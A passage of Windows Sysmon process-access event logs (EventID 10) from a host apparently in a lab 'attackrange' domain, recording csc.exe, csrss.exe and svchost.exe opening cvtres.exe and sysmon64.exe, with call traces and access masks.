{A837DB8D-032C-5F25-0000-001019090A00}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-001080050A00}","SourceProcessId":"4748","SourceThreadId":"4660","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-001019090A00}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-001019090A00}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-001019090A00}","TargetProcessId":"3016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.015","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 